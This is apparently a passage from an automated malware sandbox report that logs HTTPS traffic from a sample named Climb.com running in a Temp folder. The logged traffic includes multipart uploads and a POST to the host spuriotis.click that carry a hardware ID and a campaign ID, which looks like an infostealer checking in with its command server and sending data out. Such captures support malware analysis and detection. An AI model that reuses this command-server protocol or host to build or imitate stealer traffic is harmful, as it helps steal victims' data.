                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 45 48 32 44 58 55 54 55 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                                                                                        Data Ascii: --EH2DXUTULContent-Disposition: form-data; name="hwid"15D9A077C5D0D719D9AC212D15D33917--EH2DXUTULContent-Disposition: form-data; name="pid"1--EH2DXUTULContent-Disposition: form-data; name="lid"5FwhVM--lll--EH2DXUTULContent-Dispos
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 66 a9 fa a9 09 63 71 a9 36 e3 9c 13 c4 30 90 42 30 ed e5 94 4c 87 3c 1c 88 4d e3 dc 36 35 8c 13 cd 76 a8 e0 91 6d 83 29 a2 bb 65 1a 54 3f ce c7 b4 88 b2 ff 8c 98 82 3d 52 b4 cb db 50 ec e8 1e b5 94 1f 1d 97 b6 bb ae cb 46 04 27 68 51 ab a0 e3 05 6e 50 56 fb 76 b7 9b 07 ef 8d 37 f8 21 ba 1e 27 69 a9 59 6f 31 b6 46 7e 43 71 56 7f b5 f4 94 f1 09 0b 07 29 0a 89 91 85 88 ca 55 8d d9 bc 15 e0 77 80 aa 0c 05 11 c0 cc 00 9a c5 b1 1d bd fc a7 69 68 99 9c 1d 44 9a 68 ac ff 9c d2 c6 9d 30 ba f9 be 5b 22 36 e0 52 6b 6a a4 69 44 f8 00 cf d9 83 54 88 34 d7 7f ff 99 e5 19 9d ab 2b 90 4b a7 65 7d 66 64 fd cf 0f 37 78 36 cc 5a 14 a9 0a 63 a3 45 13 53 39 8c a4 ce 24 b6 b7 a3 f9 78 5d 3c 57 64 d1 9b 87 24 07 fb e2 45 50 6f f9 88 fb f7 9e d8 71 15 06 0d d8 d4 f6 5d fd 6b a7
                                                                                                                                                                        Data Ascii: fcq60B0L<M65vm)eT?=RPF'hQnPVv7!'iYo1F~CqV)UwihDh0["6RkjiDT4+Ke}fd7x6ZcES9$x]<Wd$EPoq]k
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 18 54 7e 70 78 fe cc 19 83 78 7d 75 6c e8 bf 9c 85 10 5f 27 1a 74 80 f5 07 44 b5 1d 1f 2f f9 28 ff e4 4f c1 92 8b e2 7b 0a 44 a1 8b a0 d5 4d f6 c1 ef 7f 57 ec f3 24 cf 6d a3 99 dd 7f 12 b5 80 4f 82 20 85 0f da c3 2b b8 02 ae 8f 38 dd dc 39 35 cf 6e fa 47 93 b8 02 c5 6e 05 f0 af 8c 46 81 64 04 bc ef c4 7d 8c d0 44 bc 4d 97 a4 f2 56 ae 9f 50 01 99 61 88 aa 59 bc 76 94 94 0e cf e2 4b 91 24 ad 36 36 50 65 33 0b 59 cb 0a 69 58 29 d1 ec 7a df 69 0d ee 27 bc 7a 07 2f 8f 62 81 30 f7 d6 cb f7 17 31 a9 4b 4a 37 7b f0 1a ae c0 04 d0 95 12 33 33 1b 8c 2a 50 1e 98 d4 a9 a1 28 3b c4 a6 eb d8 be 57 98 da e9 5a cb f9 a3 3e 3a a6 bc cb d6 15 35 2e 5f 70 09 ff e2 33 43 fc 3d 33 ed ed 3f 42 7a 6c 5f ae c2 a2 35 61 4d 6c e3 23 9c 15 49 be bf 3c da 00 fd 65 dd a2 40 95 1f 0e
                                                                                                                                                                        Data Ascii: T~pxx}ul_'tD/(O{DMW$mO +895nGnFd}DMVPaYvK$66Pe3YiX)zi'z/b01KJ7{33*P(;WZ>:5._p3C=3?Bzl_5aMl#I<e@
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: c9 5c e8 39 c6 09 3d 8b dc 6b 7c fd 91 b8 f4 a5 cc 38 fc 17 a1 5a 13 4d 33 83 89 80 68 1f f5 da 55 8e f2 3a 69 26 92 8c a2 0d 99 d0 2e 41 14 19 8c a7 10 47 39 37 f4 f3 ac bb 1b d4 ad c4 f1 1a 0b fa 75 79 bc b3 20 ca c5 9d 5b 7c a0 e0 22 10 40 53 b9 81 c7 7f 0d 24 7f b4 5d d6 63 1b c2 55 28 ab 50 79 ea 7e 24 62 58 6a 2e e1 43 25 e3 81 3d 23 37 96 98 b6 ca d9 8b fc e3 df e3 1c e6 ce 14 e9 25 37 28 cb 1f 37 81 6a fc f1 85 d0 81 aa 13 03 98 0e 34 53 72 e3 db 63 6b 73 62 77 19 e6 53 25 86 8b c3 ff 55 66 fa 72 ee 03 27 7f b6 71 b7 6a 7c 30 55 a3 1e 8b 23 b6 8c e2 ef 3d a0 e8 e3 53 8e d0 52 fb 2d 8d 65 68 b2 13 c8 7e 8c 95 33 b8 cd 41 1c c9 fc 62 42 1b 39 a4 82 b3 30 68 a8 34 68 76 92 c1 bc 08 4d 21 9e 7b 38 29 d2 f5 37 c1 1f 1c e5 68 75 59 2e be 0e f1 de d1 f1
                                                                                                                                                                        Data Ascii: \9=k|8ZM3hU:i&.AG97uy [|"@S$]cU(Py~$bXj.C%=#7%7(7j4SrcksbwS%Ufr'qj|0U#=SR-eh~3AbB90h4hvM!{8)7huY.
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 47 02 8c 4a 1a 2f d9 31 da 87 18 bb fe 77 28 d6 0a 3e 33 7c 05 de 4e dc 27 15 2b d1 b9 83 49 b3 9d 7e 11 f4 91 d2 33 e3 14 5f 8d 04 6c f4 ea ff 5f c6 0d 03 c5 76 28 5a 76 12 70 23 d3 1f 23 dc 85 e2 6d 00 28 de 22 14 5e b6 99 5a 44 e1 39 6e f9 e2 e4 f6 de d9 10 19 a4 8c cc fc d6 40 eb 6c 37 9c ef fa 82 45 aa e5 99 6d 84 75 cf ee 4d 34 fb 20 2b 1d 19 72 05 c9 d5 62 f1 5a 6d 3b d1 82 c8 aa 21 6d 78 bf 57 f3 56 c3 30 56 10 9a 36 af 24 6a f0 ef 93 5d a4 5c 34 21 a1 48 92 92 1b 8b 12 93 b2 bf d3 23 51 bb 73 05 a4 74 7c cb 71 4a db 56 09 cd ca 31 4a 27 a7 8d d4 8a b9 56 90 ba 28 b8 e2 b3 21 ab 50 8b 89 ee 16 ce 03 56 23 b2 fd 11 e2 fb 0e 62 d2 82 59 db f4 34 d2 23 78 7c 9e 5f 60 fb 72 04 44 8f 0b f5 62 ef 13 8e 2d 2e 8e 9e af 01 41 2a 2c 2b b7 2c b3 98 8b e5 e0
                                                                                                                                                                        Data Ascii: GJ/1w(>3|N'+I~3_l_v(Zvp##m("^ZD9n@l7EmuM4 +rbZm;!mxWV0V6$j]\4!H#Qst|qJV1J'V(!PV#bY4#x|_`rDb-.A*,+,
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 91 79 30 aa 53 92 bb 03 3f 64 46 2f 7b 9b e7 c5 e5 97 ef 06 c8 7b e1 5c 79 8a a3 8c 1b 48 5e e8 ee 15 3c 99 84 a5 86 f0 49 68 3d ef 57 1b c7 7c f2 15 54 67 8a 49 85 69 00 e6 b8 a0 45 45 91 13 23 cf 3e ee 8d ec 20 bd d0 96 87 6b d1 bb 6e e5 81 18 eb 33 e1 d6 dc 58 72 d5 ec 54 6c f2 49 05 d9 fb 75 b1 e2 d4 f8 35 8e 81 08 e1 13 37 48 51 97 e8 62 27 9a 16 b3 85 4e d8 47 fe 2c 33 67 98 07 b9 f1 18 77 ed 3e 16 c5 1f 3c b5 f6 8e be da 40 50 3f 86 b6 aa 97 cd f8 47 1c 9e fd 3b 7c a0 d9 a6 12 2c 3b e8 86 c6 46 c3 15 3d 41 37 45 7a b3 ff d3 be e3 e1 f6 f6 f6 a6 27 a7 d9 09 b1 d9 3f ce 9d 62 ea 67 9d 63 14 5c 5c f8 62 c2 df 14 af 75 be b5 84 29 42 1e 5a c3 1b 49 7d 63 74 84 2c f6 a1 7b a3 4d 16 8c 94 e7 ae 4f c7 a9 f2 bc 6b 33 90 5c 46 32 1c 2b c1 b7 47 37 cb 5c 94
                                                                                                                                                                        Data Ascii: y0S?dF/{{\yH^<Ih=W|TgIiEE#> kn3XrTlIu57HQb'NG,3gw><@P?G;|,;F=A7Ez'?bgc\\bu)BZI}ct,{MOk3\F2+G7\
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 54 4e 0e 26 24 53 4a 3b 0f 60 0f 14 23 e3 df de 19 cd f4 0c 23 87 9e d3 d5 f2 0e 93 d8 6b f6 32 36 49 9c b3 60 0d 6e 65 9c 3c 6a 52 74 d7 87 b7 c7 b3 ef cf 85 2f 7e 9f fe 09 3e 2b e7 30 ff 7c e8 ec fa 85 52 b1 fe e3 25 99 59 77 c3 69 3f aa f6 0e 75 66 6e a1 b8 dc b4 16 96 48 45 43 6e a9 8a 5a ee ab b7 f9 d6 fd 7d df 7c a3 97 49 7a cc ff f5 05 d1 30 e3 e7 b5 f1 a6 bf 94 6f 1d 87 dc 16 e7 2b b0 5f 37 4b ea ff fb dc fc b7 ab 5d 35 92 4e 85 bd 83 a5 b9 89 35 1d 36 5d 3e 28 f5 de e7 fd 70 84 29 ac be 68 bf 33 f0 c0 5d d2 5b af 5d 4d 08 dd 6a 3d 9f a4 e6 f7 66 46 cb 51 28 8b ba e8 56 e8 ff 66 c6 c6 69 39 d7 da 29 a8 74 e9 ca 76 b1 ad 53 50 c5 f4 2b 98 2a b3 76 48 ad f4 7d 7f a2 d3 5a 6e d8 34 3a fb 29 23 35 b7 a9 cd 6a fe 51 5b 70 57 0d be be 56 ad 9a 16 ed 92
                                                                                                                                                                        Data Ascii: TN&$SJ;`##k26I`ne<jRt/~>+0|R%Ywi?ufnHECnZ}|Iz0o+_7K]5N56]>(p)h3][]Mj=fFQ(Vfi9)tvSP+*vH}Zn4:)#5jQ[pWV
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 1b 12 49 24 42 7d 83 a7 dd 65 ac 06 1f 9e 1e 41 8c 43 b8 cd 89 aa 92 a8 86 86 bf c4 5d 53 28 38 d6 d4 9e 92 62 ce 4f b6 67 0e 02 3f a1 9c c9 f7 63 96 93 5c e7 63 37 6e 7f 88 89 db 31 46 85 47 05 a3 e0 32 42 d4 e4 71 89 fc c5 fe 40 ef 84 3b 7f fa 5c a2 e1 c3 b1 9c c0 9d b0 ad 92 c2 dd 7b fe e0 3e 55 83 e8 bb 51 c1 ca 6b 56 45 89 88 fb 12 43 17 81 ab 7c ad d0 b5 af ef c4 d4 6b 0c f6 df 71 f2 63 76 8c ba 5c ab c1 6d 1c 63 b9 8d 3a 7d 5b b6 41 43 c7 0d 5b 36 c3 ad 91 40 90 7d e0 df 7b 76 47 d4 54 c1 2b c4 8b 16 b7 ca 51 84 be b3 54 77 83 7e bd 0c e9 b2 f7 c6 ce c7 f1 d7 3c ad a5 53 75 95 95 7e 5e 95 80 30 48 c9 78 c9 58 96 72 1f 9d 44 cc 49 7b df 5b 98 09 6e ea f9 29 48 66 a6 e0 85 10 af a4 8b da 7f 98 5b af 40 c1 cd 21 3a 6c 17 b3 16 fa de ef 3e 20 c7 53 a7
                                                                                                                                                                        Data Ascii: I$B}eAC]S(8bOg?c\c7n1FG2Bq@;\{>UQkVEC|kqcv\mc:}[AC[6@}{vGT+QTw~<Su~^0HxXrDI{[n)Hf[@!:l> S
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: ad 5f 60 47 7d 48 28 f6 17 2b b3 40 90 4d 37 c0 0a 81 41 d2 45 7d 93 25 3e 26 30 54 d4 6a 62 c3 dd d4 80 fa f4 b0 1b 39 19 e1 9a d3 b4 1a c9 ff 27 ce cb 9d f6 c0 76 ea f3 f4 f4 84 3e db 5b 80 a5 43 7c 94 69 ba 9e 82 c7 0b 79 dd c0 12 a3 b2 10 a4 53 81 27 4f 46 87 aa cd 05 42 5c bf df 03 54 f6 a8 e8 d7 20 e6 e6 02 7b 99 9c 88 d2 37 d5 bf 96 bd d5 ea 4a 75 1a 76 61 5f 37 3b a9 7a be 52 4d f7 c2 fc ff 8e 91 48 d3 85 3e 5b fd 6e 60 0e 00 d0 7a 15 94 b1 cf 3e 75 8e f9 15 c5 58 bb dd f5 e4 e2 8d 0d 9e e8 f6 1e 89 c2 23 97 26 3a f3 8a 4a d9 25 6e 1f 4f 79 f6 2c 33 c5 14 2b 42 c2 12 d1 29 05 a1 06 42 6d 93 22 22 44 ea 60 f3 d7 e3 51 0b 8f c8 45 91 dc 17 35 ff 0e 73 57 a0 ce fc ef f1 93 fb c9 e7 4c c1 c8 34 fd 95 44 aa 04 a7 de 87 d1 36 b2 79 e4 70 97 7b fa c4 d6
                                                                                                                                                                        Data Ascii: _`G}H(+@M7AE}%>&0Tjb9'v>[C|iyS'OFB\T {7Juva_7;zRMH>[n`z>uX#&:J%nOy,3+B)Bm""D`QE5sWL4D6yp{
                                                                                                                                                                        2024-12-28 08:35:06 UTC15331OUTData Raw: 07 38 10 76 13 15 bc 75 97 a0 d1 f6 3e e5 23 ee 45 ba a2 48 35 c9 3e 09 61 1b 2c 14 63 43 9d f7 d6 f8 a9 f7 6b 34 de b9 4a 7c 73 1d cf e7 bf f2 a3 b2 fa 43 8d 43 6f 56 7d 6c 24 af 85 c8 a6 57 02 77 4d 23 4e e4 70 b9 d3 9a f8 75 d2 f5 27 29 15 77 83 45 22 86 57 ad 7d 38 11 a6 af b8 c9 17 cf 0e f8 1c e5 a7 72 13 21 8e cf f3 35 2d cc 83 c4 77 85 a5 d1 8c fb f7 99 85 8b 2f 3e 5f 47 3a 4a 81 fc 6d d0 44 a9 c8 33 05 d0 dd 0a f1 a3 59 53 78 29 7e c3 c2 f0 6e ba 70 b7 b6 c8 91 15 f7 57 8a cf 3e 42 dd 10 be f3 40 d8 ce 4f 08 72 a6 82 ac 62 f4 8b 1e e7 cc 88 13 8a 87 0c cd da 11 b5 41 a0 e8 d9 13 3e 83 4d e5 9b d2 e4 32 68 de 6d bd 63 43 17 a4 d6 19 ec 26 18 73 b4 70 d2 a4 55 18 03 2b d4 49 79 1b 42 30 4c 2b 21 d6 cf fe 46 88 fd 56 70 0d f7 c3 b9 34 6d c6 d5 99 21
                                                                                                                                                                        Data Ascii: 8vu>#EH5>a,cCk4J|sCCoV}l$WwM#Npu')wE"W}8r!5-w/>_G:JmD3YSx)~npW>B@OrbA>M2hmcC&spU+IyB0L+!FVp4m!
                                                                                                                                                                        2024-12-28 08:35:09 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:35:09 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=mvt70lk568uatesfij51tvclm0; expires=Wed, 23 Apr 2025 02:21:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NqLyHhUOBEg35KU8Ly3FjyfDJVHnBXEpZPsRt1wp2EMMK%2FUcvMuxK2Nm3oAWTFl3W99lWMaSvoJ9P1fWn4fG9nKDomRzw2ujDMYXityQOSH5C6SxD7%2B65o69aFDhGSbosPE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9037115d690f51-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1467&min_rtt=1461&rtt_var=561&sent=341&recv=572&lost=0&retrans=0&sent_bytes=2834&recv_bytes=554785&delivery_rate=1928665&cwnd=204&unsent_bytes=0&cid=7b402cf9269df4e3&ts=2284&x=0"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        8192.168.2.749801172.67.128.1844437780C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-28 08:35:10 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 80
                                                                                                                                                                        Host: spuriotis.click
                                                                                                                                                                        2024-12-28 08:35:10 UTC80OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d 26 68 77 69 64 3d 31 35 44 39 41 30 37 37 43 35 44 30 44 37 31 39 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37
                                                                                                                                                                        Data Ascii: act=get_message&ver=4.0&lid=5FwhVM--lll&j=&hwid=15D9A077C5D0D719D9AC212D15D33917
                                                                                                                                                                        2024-12-28 08:35:11 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 28 Dec 2024 08:35:11 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=53lvgl6p01ohoi0roiaihkdgru; expires=Wed, 23 Apr 2025 02:21:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=INJx2eQ8UFcjRvdhsY9I5%2FZJPvmXzzxOcPblf27ks%2BEFpdtNSB3ae%2FRn1RdBVnXDAAEnyVQ7hfcfKJjDbW3Tc4%2ByZeXviO%2B3Z9mD9dVGbhvK5BdqBf5siACBqqC2%2BAjLG44%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f9037283cc4435c-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1570&rtt_var=605&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=979&delivery_rate=1783750&cwnd=249&unsent_bytes=0&cid=a81ef3fdff234176&ts=794&x=0"
                                                                                                                                                                        2024-12-28 08:35:11 UTC240INData Raw: 31 61 66 30 0d 0a 4e 6e 35 73 71 67 50 48 6d 78 37 41 53 4f 65 6c 53 4b 46 48 50 4e 57 2f 6e 75 63 4a 50 66 74 72 6d 34 77 48 66 39 57 65 37 66 56 74 42 55 37 4d 64 2b 57 68 4c 2b 78 71 67 6f 64 79 6b 47 73 65 73 5a 32 6b 78 54 46 6f 67 51 32 72 75 54 4a 47 6c 4e 43 67 6f 6e 4d 4c 4b 38 31 71 38 63 63 78 6e 47 65 75 36 67 76 44 43 56 75 5a 68 2b 32 73 63 48 6d 69 43 73 4b 36 51 51 75 34 2b 34 4f 78 54 30 59 71 32 32 57 54 39 53 33 77 43 64 66 64 41 66 4a 7a 58 5a 62 7a 37 4c 73 6d 42 5a 78 66 30 66 38 31 50 71 50 6e 6d 6f 64 2f 4d 77 54 61 61 61 6a 4d 4c 4a 70 2b 68 50 55 59 35 77 6f 50 37 50 44 37 67 56 68 35 72 79 33 7a 77 47 38 51 6e 4f 75 62 71 52 6b 48 4b 4d 31 75 76 63 4a 64 6e 47 65 72 35 6a 76 47 64 58
                                                                                                                                                                        Data Ascii: 1af0Nn5sqgPHmx7ASOelSKFHPNW/nucJPftrm4wHf9We7fVtBU7Md+WhL+xqgodykGsesZ2kxTFogQ2ruTJGlNCgonMLK81q8ccxnGeu6gvDCVuZh+2scHmiCsK6QQu4+4OxT0Yq22WT9S3wCdfdAfJzXZbz7LsmBZxf0f81PqPnmod/MwTaaajMLJp+hPUY5woP7PD7gVh5ry3zwG8QnOubqRkHKM1uvcJdnGer5jvGdX
                                                                                                                                                                        2024-12-28 08:35:11 UTC1369INData Raw: 75 34 38 50 61 47 59 56 4f 4c 48 4b 50 51 4b 45 36 62 38 74 36 76 41 54 51 76 2b 44 66 30 36 6d 75 45 4f 37 58 4b 66 74 4d 55 64 62 76 51 32 49 6c 43 63 73 68 54 37 66 52 47 4d 71 62 2f 69 5a 64 63 43 56 54 47 54 49 48 35 55 76 4a 36 6b 63 4a 78 6b 44 46 6f 6a 34 6a 30 30 30 31 74 7a 79 44 73 7a 57 30 5a 68 38 32 33 7a 48 30 72 48 75 4e 4f 76 36 39 6b 72 78 2b 4c 2f 32 50 34 46 33 47 41 31 4f 72 51 57 6c 69 64 4f 74 2f 59 51 52 65 5a 39 6f 4b 79 51 77 67 77 68 56 4b 50 36 58 4f 71 4c 36 54 35 5a 2b 6f 45 54 37 4b 4e 32 5a 52 47 56 5a 6b 78 39 66 78 77 52 2b 33 49 6c 35 4d 47 53 31 6e 65 51 6f 6e 57 53 59 55 39 6f 4d 49 68 6c 78 73 54 69 5a 44 54 71 45 70 78 74 51 7a 58 74 48 51 4f 72 4e 71 33 77 32 39 49 4b 74 35 75 6f 76 56 61 75 6e 75 7a 36 78 53 4f 45
                                                                                                                                                                        Data Ascii: u48PaGYVOLHKPQKE6b8t6vATQv+Df06muEO7XKftMUdbvQ2IlCcshT7fRGMqb/iZdcCVTGTIH5UvJ6kcJxkDFoj4j0001tzyDszW0Zh823zH0rHuNOv69krx+L/2P4F3GA1OrQWlidOt/YQReZ9oKyQwgwhVKP6XOqL6T5Z+oET7KN2ZRGVZkx9fxwR+3Il5MGS1neQonWSYU9oMIhlxsTiZDTqEpxtQzXtHQOrNq3w29IKt5uovVaunuz6xSOE
                                                                                                                                                                        2024-12-28 08:35:11 UTC1369INData Raw: 4a 31 56 4d 4c 6d 44 76 4c 79 6b 70 4d 37 4e 47 49 6b 32 63 36 4f 4f 78 72 69 2f 4e 78 69 54 32 52 2b 57 66 59 41 31 75 34 78 63 65 6b 56 52 4b 33 4b 4f 6a 72 4e 54 69 34 30 59 57 58 62 42 41 63 33 54 76 2f 7a 6d 53 6d 65 4e 4b 51 63 65 41 4a 63 59 4c 36 36 36 42 75 56 4d 30 33 74 4e 41 6f 4e 70 72 64 6a 37 74 52 4d 6c 54 5a 53 4c 37 66 52 36 45 52 30 65 4d 38 7a 43 4a 53 6b 63 58 6d 73 30 64 68 31 44 2f 31 34 6a 63 2b 35 65 61 30 70 67 49 66 4c 2b 5a 78 6d 37 51 6d 70 33 79 74 31 6e 72 67 4d 55 57 69 7a 64 65 70 59 55 32 52 42 4d 79 2b 58 55 6d 32 7a 72 32 7a 65 30 31 56 35 57 61 68 79 6c 71 55 44 6f 2f 70 49 4d 34 4f 53 61 50 6a 73 5a 35 4e 57 70 59 52 77 73 39 62 55 4a 6e 64 6e 70 49 45 4f 51 48 6c 61 36 58 42 63 4c 41 2f 33 35 30 64 32 79 45 4d 34 49
                                                                                                                                                                        Data Ascii: J1VMLmDvLykpM7NGIk2c6OOxri/NxiT2R+WfYA1u4xcekVRK3KOjrNTi40YWXbBAc3Tv/zmSmeNKQceAJcYL666BuVM03tNAoNprdj7tRMlTZSL7fR6ER0eM8zCJSkcXms0dh1D/14jc+5ea0pgIfL+Zxm7Qmp3yt1nrgMUWizdepYU2RBMy+XUm2zr2ze01V5WahylqUDo/pIM4OSaPjsZ5NWpYRws9bUJndnpIEOQHla6XBcLA/350d2yEM4I
                                                                                                                                                                        2024-12-28 08:35:11 UTC1369INData Raw: 57 36 64 45 36 2f 55 33 47 34 50 73 68 72 49 42 50 56 58 74 57 76 58 57 4a 71 4d 4b 68 4a 78 2f 32 54 42 30 6e 39 7a 58 71 6e 67 4f 6a 44 6e 39 76 44 4d 4f 6a 64 32 59 76 56 55 52 44 35 4a 46 72 39 64 32 73 6a 4b 66 34 43 58 41 43 6c 37 6c 31 66 4f 67 54 31 2b 34 47 50 79 6e 54 52 32 78 79 61 43 55 63 45 38 4b 2f 47 79 31 31 6e 6d 4d 41 37 4c 76 41 75 38 69 57 49 66 4d 79 59 68 56 45 71 49 6a 37 4f 41 78 53 72 6e 72 33 62 68 46 4d 54 53 53 51 71 72 36 61 66 45 6b 71 4a 41 67 2b 48 39 79 37 66 76 4a 70 57 68 70 6e 56 79 76 39 56 55 53 68 4f 65 72 7a 41 59 72 4a 4e 42 72 6f 65 4e 53 72 43 2b 32 38 6a 6e 4f 4d 48 72 6a 36 50 32 2f 65 51 79 53 42 73 7a 2f 5a 54 79 32 79 49 71 30 55 68 59 39 32 47 43 72 32 58 6d 6c 45 4e 54 30 49 64 63 33 42 61 58 73 30 72 38
                                                                                                                                                                        Data Ascii: W6dE6/U3G4PshrIBPVXtWvXWJqMKhJx/2TB0n9zXqngOjDn9vDMOjd2YvVURD5JFr9d2sjKf4CXACl7l1fOgT1+4GPynTR2xyaCUcE8K/Gy11nmMA7LvAu8iWIfMyYhVEqIj7OAxSrnr3bhFMTSSQqr6afEkqJAg+H9y7fvJpWhpnVyv9VUShOerzAYrJNBroeNSrC+28jnOMHrj6P2/eQySBsz/ZTy2yIq0UhY92GCr2XmlENT0Idc3BaXs0r8
                                                                                                                                                                        2024-12-28 08:35:11 UTC1369INData Raw: 74 4c 68 51 45 72 6b 70 35 36 68 41 68 45 69 6e 6e 61 52 37 48 75 32 49 4a 4c 68 42 4f 41 77 57 4c 72 55 71 5a 4e 6c 56 5a 34 66 39 4c 6c 73 53 6f 66 6e 76 71 6b 5a 53 44 72 36 57 62 50 7a 63 5a 63 78 76 65 30 53 6d 42 63 4c 34 6f 6a 73 73 6d 74 55 79 44 33 70 35 7a 38 53 67 4f 65 70 76 6b 5a 4e 46 65 35 30 6d 37 52 48 71 43 2b 37 69 67 7a 58 4d 45 7a 6e 36 75 6a 54 53 31 4f 38 57 65 76 37 50 79 50 36 36 4a 75 52 51 69 77 5a 6b 30 66 32 2f 55 71 46 59 36 44 43 43 2b 5a 30 42 61 66 6d 2b 59 78 2f 42 61 30 33 74 4f 6f 7a 42 62 6d 71 67 59 5a 52 4f 54 62 61 62 6f 2f 48 4d 66 4d 79 6b 50 38 6b 30 67 45 49 76 50 76 57 6a 56 4d 4e 6f 67 66 79 33 6d 67 7a 72 39 47 46 68 48 6f 6b 42 70 30 6f 76 76 51 6d 6f 58 32 57 2f 52 53 4f 41 47 57 50 31 71 61 33 52 6e 75 2f
                                                                                                                                                                        Data Ascii: tLhQErkp56hAhEinnaR7Hu2IJLhBOAwWLrUqZNlVZ4f9LlsSofnvqkZSDr6WbPzcZcxve0SmBcL4ojssmtUyD3p5z8SgOepvkZNFe50m7RHqC+7igzXMEzn6ujTS1O8Wev7PyP66JuRQiwZk0f2/UqFY6DCC+Z0Bafm+Yx/Ba03tOozBbmqgYZROTbabo/HMfMykP8k0gEIvPvWjVMNogfy3mgzr9GFhHokBp0ovvQmoX2W/RSOAGWP1qa3Rnu/
